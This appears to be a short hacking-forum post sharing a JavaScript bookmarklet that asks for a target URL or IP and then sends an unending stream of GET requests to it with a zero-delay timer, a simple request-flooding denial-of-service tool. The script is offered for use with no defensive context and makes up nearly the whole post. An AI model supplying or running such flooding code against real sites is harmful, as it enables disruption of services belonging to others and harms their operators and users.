hacxx
VIP
- Joined
- May 29, 2021
- Messages
- 1,018
Code:
javascript:var keyword = prompt("Type target site or IP! (ex: http://127.0.0.1)", ""); function infinite() { setInterval(function() { var xhr = new XMLHttpRequest(); xhr.open("GET", keyword, true); xhr.send(); }, 0); } infinite();
View online:

